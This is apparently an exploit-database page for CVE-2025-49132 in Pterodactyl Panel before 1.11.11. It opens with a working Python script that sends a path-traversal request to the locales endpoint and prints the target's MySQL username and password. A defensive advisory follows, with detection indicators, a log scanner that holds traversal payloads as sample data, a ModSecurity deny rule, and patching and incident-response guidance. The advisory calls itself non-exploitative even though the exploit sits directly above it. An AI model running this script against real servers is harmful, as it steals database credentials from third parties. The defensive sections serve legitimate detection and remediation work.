Pterodactyl Panel 1.11.11 - Remote Code Execution (RCE)
# Exploit Title: Pterodactyl Panel 1.11.11 - Remote Code Execution (RCE)
# Date: 22/06/2025
# Exploit Author: Zen-kun04
# Vendor Homepage: https://pterodactyl.io/
# Software Link: https://github.com/pterodactyl/panel
# Version: < 1.11.11
# Tested on: Ubuntu 22.04.5 LTS
# CVE: CVE-2025-49132
import requests
import json
import argparse
import colorama
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

arg_parser = argparse.ArgumentParser(
    description="Check if the target is vulnerable to CVE-2025-49132.")
arg_parser.add_argument("target", help="The target URL")
args = arg_parser.parse_args()

try:
    target = args.target.strip() + '/' if not args.target.strip().endswith('/') else args.target.strip()
    r = requests.get(f"{target}locales/locale.json?locale=../../../pterodactyl&namespace=config/database", allow_redirects=True, timeout=5, verify=False)
    if r.status_code == 200 and "pterodactyl" in r.text.lower():
        try:
            raw_data = r.json()
            data = {
                "success": True,
                "host": raw_data["../../../pterodactyl"]["config/database"]["connections"]["mysql"].get("host", "N/A"),
                "port": raw_data["../../../pterodactyl"]["config/database"]["connections"]["mysql"].get("port", "N/A"),
                "database": raw_data["../../../pterodactyl"]["config/database"]["connections"]["mysql"].get("database", "N/A"),
                "username": raw_data["../../../pterodactyl"]["config/database"]["connections"]["mysql"].get("username", "N/A"),
                "password": raw_data["../../../pterodactyl"]["config/database"]["connections"]["mysql"].get("password", "N/A")
            }
            print(f"{colorama.Fore.LIGHTGREEN_EX}{target} => {data['username']}:{data['password']}@{data['host']}:{data['port']}/{data['database']}{colorama.Fore.RESET}")
        except json.JSONDecodeError:
            print(colorama.Fore.RED + "Not vulnerable" + colorama.Fore.RESET)
        except TypeError:
            print(colorama.Fore.YELLOW + "Vulnerable but no database" + colorama.Fore.RESET)
    else:
        print(colorama.Fore.RED + "Not vulnerable" + colorama.Fore.RESET)
except requests.RequestException as e:
    if "NameResolutionError" in str(e):
        print(colorama.Fore.RED + "Invalid target or unable to resolve domain" + colorama.Fore.RESET)
    else:
        print(f"{colorama.Fore.RED}Request error: {e}{colorama.Fore.RESET}")

Pterodactyl Panel 1.11.11 — Remote Code Execution (CVE-2025-49132)
This article provides a security-focused, non-exploitative overview of the CVE-2025-49132 vulnerability affecting Pterodactyl Panel versions prior to 1.11.11. It explains the high-level technical root cause, potential impact, detection and mitigation strategies, recommended patching and configuration steps, and incident response guidance for defenders and administrators.
Summary
Pterodactyl Panel prior to 1.11.11 contains a vulnerability that can be abused to expose sensitive configuration material and, in some scenarios, lead to remote code execution (RCE). The vendor has published fixes in the 1.11.11 release. Administrators should treat this as a high-severity issue because it can expose database credentials and other secrets used by the panel and its worker nodes.
Key takeaways
- Affected versions: Pterodactyl Panel < 1.11.11
- CVE: CVE-2025-49132
- Primary impact: disclosure of secrets (DB credentials) and possible RCE depending on environment and chaining
- Immediate action: patch to 1.11.11 or later, rotate exposed credentials, and harden access controls
High-level technical description (non-actionable)
At a high level, the flaw is caused by inadequate input validation within a component that loads localization or configuration resources. This allows crafted requests to traverse application resource paths and retrieve configuration objects or files that are not intended to be publicly accessible. When an attacker can obtain credentials or configuration details (for example, database usernames and passwords), they may be able to further compromise the system (credential reuse, lateral movement, or remote code execution via chained vulnerabilities or misconfigurations).
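The root cause described above is a resource loader that lets request parameters steer which file is read. The following is an added example, not Pterodactyl's own code, showing how such a loader should be written: the `locale` and `namespace` parameters are validated against a strict allowlist, and the resolved path is then checked for containment under the base directory as a second, independent control. The directory layout (`<base>/<locale>/<namespace>.json`) and the base path used in the demo are hypothetical; the `naive_join` helper exists only to contrast the unsafe pattern with the hardened one.

```python
import re
from pathlib import Path

# Hypothetical layout: <base>/<locale>/<namespace>.json. This is a demonstration,
# not Pterodactyl's own loader or directory structure.
LOCALE_RE = re.compile(r'[a-z]{2}(?:[-_][A-Za-z]{2,4})?')   # en, en_US, pt-BR
NAMESPACE_RE = re.compile(r'[a-z][a-z0-9_]{0,63}')         # validation, dashboard


class InvalidResourceRequest(ValueError):
    """Raised for any locale/namespace that fails validation or containment."""


def resolve_locale_file(base_dir, locale, namespace):
    """Map a (locale, namespace) pair to a file under base_dir, or raise.

    Two independent controls: an allowlist on the inputs (so separators, dots and
    encoded bytes never reach the filesystem layer) and a containment check on the
    resolved path (defence in depth against symlinks or a later loosening of the
    regexes).
    """
    if not LOCALE_RE.fullmatch(locale):
        raise InvalidResourceRequest(f"locale rejected: {locale!r}")
    if not NAMESPACE_RE.fullmatch(namespace):
        raise InvalidResourceRequest(f"namespace rejected: {namespace!r}")
    base = Path(base_dir).resolve()
    candidate = (base / locale / f"{namespace}.json").resolve()
    if base not in candidate.parents:
        raise InvalidResourceRequest(f"resolved outside base: {candidate}")
    return candidate


def naive_join(base_dir, locale, namespace):
    """The unsafe pattern, for contrast only: trust the inputs and just join them."""
    return (Path(base_dir) / locale / f"{namespace}.json").resolve()


def escapes_base(base_dir, path):
    """True when path does not sit beneath base_dir after resolution."""
    base = Path(base_dir).resolve()
    return base not in Path(path).resolve().parents


def classify(base_dir, locale, namespace):
    """Return ('ok', relative path) or ('rejected', reason) from the hardened resolver."""
    try:
        p = resolve_locale_file(base_dir, locale, namespace)
        return ('ok', p.relative_to(Path(base_dir).resolve()).as_posix())
    except InvalidResourceRequest as exc:
        return ('rejected', str(exc))


if __name__ == '__main__':
    base = '/srv/panel/resources/lang'   # hypothetical base directory
    for loc, ns in [('en', 'validation'), ('pt-BR', 'dashboard'),
                    ('../../../pterodactyl', 'config/database'),
                    ('en', 'config/database')]:
        verdict, detail = classify(base, loc, ns)
        unsafe = naive_join(base, loc, ns)
        print(f"{verdict:8} {loc!r:24} {ns!r:18} -> {detail}"
              f"   (naive join escapes base: {escapes_base(base, unsafe)})")
```

The allowlist alone would already stop the traversal input, but the containment check is what protects the loader when someone later relaxes the regex or a symlink appears inside the locale tree; keeping both is the point of the example.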
Impact and risk
- Secret disclosure: Database connection strings, API keys, or other secrets stored in panel configuration files may be exposed.
- Privileged access: If database credentials are valid and privileged, an attacker could read or modify the application database, escalate privileges, or pivot to other systems.
- Remote code execution (RCE): In some environments, disclosed secrets or other configuration details can be used together with other weak controls to achieve RCE.
- Operational impact: Game servers and hosted services relying on the panel may be disrupted, and customer data or billing information could be exposed.
Detection and indicators of compromise (IoCs)
Below are defensive indicators and log patterns you can monitor. These are for detection, not exploitation.
- Unusual HTTP requests targeting localization or configuration endpoints (e.g., requests with "locales", "locale", or similar query parameters).
- Requests containing traversal patterns in query strings observed in access logs (e.g., sequences of "../" or percent-encoded variants), especially when targeting API or resource endpoints.
- Unexpected outbound database connections from panel hosts to unknown IPs.
- Application logs showing errors or JSON dumps containing configuration data served via endpoints.
Example log search rules (SIEM-friendly)
| Use case | Example search |
|---|---|
| Detect potential traversal attempts | |
| Detect JSON responses containing configuration keys | |
Explanation: These searches are intended to detect suspicious requests and responses. Tune them to reduce false positives (e.g., legitimate locale queries) and monitor for actual data leakage.
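As an added example that is not part of the original advisory, the script below implements the first two indicators above as a small access-log scanner: it parses combined-format log lines, percent-decodes the request target repeatedly so double-encoded sequences such as `%252e` are normalised, flags `..` path segments, and rates a hit as high when it targets the `/locales/` endpoint and the server answered 200 (a refused request is rated medium). The log lines are constructed for the demonstration; the IPs, timestamps and user agents are not real traffic.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in the common "combined" access-log format.
# IPs, timestamps and requests are made up for this demonstration.
SAMPLE_LOG = """\
203.0.113.10 - - [22/Jun/2025:10:00:01 +0000] "GET /locales/locale.json?locale=en&namespace=validation HTTP/1.1" 200 1842 "-" "Mozilla/5.0"
203.0.113.11 - - [22/Jun/2025:10:00:02 +0000] "GET /locales/locale.json?locale=../../../pterodactyl&namespace=config/database HTTP/1.1" 200 912 "-" "python-requests/2.32"
203.0.113.12 - - [22/Jun/2025:10:00:03 +0000] "GET /locales/locale.json?locale=%2E%2E%2F%2E%2E%2Fetc&namespace=app HTTP/1.1" 403 153 "-" "curl/8.5.0"
203.0.113.13 - - [22/Jun/2025:10:00:04 +0000] "GET /locales/locale.json?locale=%252e%252e%252fpterodactyl&namespace=config HTTP/1.1" 200 388 "-" "curl/8.5.0"
203.0.113.14 - - [22/Jun/2025:10:00:05 +0000] "GET /api/client/servers HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.15 - - [22/Jun/2025:10:00:06 +0000] "GET /assets/app.min.js HTTP/1.1" 200 90231 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# A ".." path segment after decoding: at the start of a value or after a
# non-word separator, followed by a slash, a query delimiter, or end of string.
TRAVERSAL_RE = re.compile(r'(?:^|[^\w.])\.\.(?:/|[&#?]|$)')


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded sequences (%252e) normalise too."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def has_traversal(target):
    """True when the decoded request target contains a '..' path segment."""
    normalised = fully_decode(target).replace('\\', '/')
    return TRAVERSAL_RE.search(normalised) is not None


def scan_access_log(text):
    """Return one finding dict per log line that carries a traversal pattern."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m or not has_traversal(m.group('target')):
            continue
        decoded = fully_decode(m.group('target'))
        status = int(m.group('status'))
        # Traversal against the locale endpoint answered with 200 is the pattern the
        # article describes; a 4xx means the server or WAF refused it.
        on_locale_endpoint = decoded.startswith('/locales/')
        severity = 'high' if on_locale_endpoint and status == 200 else 'medium'
        findings.append({
            'ip': m.group('ip'),
            'time': m.group('ts'),
            'target': m.group('target'),
            'decoded': decoded,
            'status': status,
            'severity': severity,
        })
    return findings


if __name__ == '__main__':
    for f in scan_access_log(SAMPLE_LOG):
        print(f"[{f['severity'].upper()}] {f['ip']} {f['status']} {f['decoded']}")
```

Run it against a real access log by reading the file into `scan_access_log`; the decode loop is what keeps the `%252e` variant from slipping past a single-pass rule, and the status code lets you separate blocked probes from requests that were actually served.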
Immediate mitigation and containment
If you suspect compromise or want to proactively reduce risk, take the following steps.
- Patch immediately: Upgrade the panel to version 1.11.11 or later. This is the primary and recommended remediation.
- Restrict access: Limit panel access to management networks via firewall rules, VPNs, or IP allowlists while you assess and patch.
- Rotate secrets: If you find evidence of credential exposure (database credentials, API keys), rotate them immediately and update dependent services.
- Harden webserver: Ensure directories outside the public webroot are not served by the webserver and deny direct HTTP access to internal config or locale directories.
- Monitor & alert: Watch for unusual database access patterns, new user accounts, or changes to server binaries.
How to upgrade safely (recommended process)
Follow the vendor’s official upgrade path. The steps below are a general, defensive outline — adapt to your deployment model (package, Docker, manual git installation).
# Example high-level upgrade checklist (non-exploitative)
1. Backup: snapshot servers, backup panel database and config files.
2. Read release notes for 1.11.11 and later to understand breaking changes.
3. Put the panel into maintenance mode (if supported).
4. Perform the upgrade in a staging environment first. Test functionality.
5. Apply the patch to production during a maintenance window.
6. Verify services (panel, wings/daemon, workers) are healthy.
7. Rotate secrets if you suspect any exposure.
8. Remove maintenance mode and monitor logs closely.
Explanation: This checklist emphasizes safe change management — take backups, test in staging, and monitor after deploying fixes.
Web server and WAF mitigations (defensive rule examples)
As a short-term protective measure, you can add server rules or WAF policies that block requests with obvious directory traversal attempts in query parameters. These are defensive and reduce the attack surface while you patch. Example rules must be tuned to avoid blocking legitimate traffic.
# Example ModSecurity rule (conceptual, defensive)
SecRule REQUEST_URI|ARGS "@rx (?i)(\.\./|\%2e\%2e/)" \
"id:100001,phase:1,deny,status:403,msg:'Blocked potential directory traversal request',log"
Explanation: This ModSecurity rule blocks requests containing "../" or percent-encoded equivalents in the URI or arguments; the leading (?i) makes the match case-insensitive so that "%2E%2E/" is caught as well as "%2e%2e/". It is intended as a temporary mitigation; the regex must be tuned and tested against your own traffic to avoid false positives.
Hardening and long-term recommendations
- Keep Pterodactyl and all dependencies (PHP, web server, OS packages) up to date and subscribe to vendor security announcements.
- Restrict the panel UI to administrator networks or use VPN/IP allowlists.
- Use strong, unique credentials for databases and service accounts; avoid using the same credentials across multiple services.
- Apply the principle of least privilege to database accounts — only grant required permissions.
- Use secrets management for credentials rather than storing plaintext config in web-accessible locations.
- Harden the host with OS-level controls: SELinux/AppArmor, up-to-date kernel, and process isolation for worker processes.
- Enable logging and centralized monitoring for anomalous behavior and set up alerting for high-risk indicators.
Incident response checklist
- Isolate affected systems from the network if active exploitation is detected.
- Preserve logs and disk images for forensic analysis.
- Identify and rotate any credentials that may have been exposed (DB, API keys, service accounts).
- Perform integrity checks on code, installed packages, and system binaries; look for unauthorized changes or backdoors.
- Rebuild compromised hosts from known-good images if persistence is suspected.
- Engage stakeholders and notify customers if sensitive data was exposed per legal/regulatory requirements.
References and resources
- Pterodactyl official site and release notes — follow vendor advisories for exact patch instructions.
- CVE-2025-49132 — use official CVE details and vendor-issued security bulletin for authoritative guidance.
- OWASP secure configuration guidance — general web-application hardening best practices.
Closing (practical summary)
If you operate Pterodactyl Panel, prioritize upgrading to the fixed release (1.11.11 or later), rotate any potentially exposed secrets, and apply short-term mitigations like network restrictions and WAF rules while you patch. Implement stronger access controls and continuous monitoring to reduce risk from similar issues in the future.